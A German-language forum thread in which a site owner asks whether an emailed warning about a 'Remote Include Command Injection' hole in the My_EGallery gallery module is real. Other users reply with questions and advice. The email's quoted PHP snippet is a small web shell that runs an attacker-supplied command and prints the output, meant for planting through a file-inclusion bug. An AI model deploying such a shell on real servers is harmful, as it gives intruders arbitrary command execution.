Sicherheitslücke in My_EGallery ?

[M-H]

hi

ich hab heute eine e-mail bekommen von jemandem der behauptet dass My_EGallery eine Sicherheitslücke hat.

er hat gesagt, dass die lücke ein "Remote Include Command Injection" ist. und ich musste ne Update für den script von My_EGallery machen, oder den Fehler korrigieren.

> <?
>   // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
>   if (isset($chdir)) @chdir($chdir);
>   ob_start();
>   execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");

>   $output = ob_get_contents();
>   ob_end_clean();
>   print_output();
> ?>

soll ich mir Sorgen machen? gibt's diesen Fehler wirklich? :-\

Danke schon mal für die Antwort !

 

[BasicAvid]

Hallo,

es gibt Sicherheitslücken bei My_EGallery, aber diese, habe ich nicht gefunden. Der Code den Du gepostet hast, ist das der Code den Du einbauen solltest?
Kennst Du die Person die Dir die EMail-Adresse gesendet hast?

Schau doch mal bei Heise-Security vorbei!

 

[M-H]

danke BasicAvid für die Antwort.

die Sache ist schon gereglt. ich hab in einem nuke-forum gefragt. die sagen dass das Fehler seit 2 Jahren nicht mehr gibt.


ich wusste auch nicht, was ich mit dem Code machen soll

und die Person die mir die e-mail gesendet hat, hat sich als "white Hacker" vorgestellt.

 

[Mackz]

Original von M-H
die Sache ist schon gereglt. ich hab in einem nuke-forum gefragt. die sagen dass das Fehler seit 2 Jahren nicht mehr gibt.

Du verwendest aber nicht vielleicht eine 2 Jahre alte Version!?

 

[M-H]

ich hoffe, dass das nicht der Fall ist


ich hab erst vor 6 Monate meine My_EGallery installiert, ich denke, die war die actuelle Version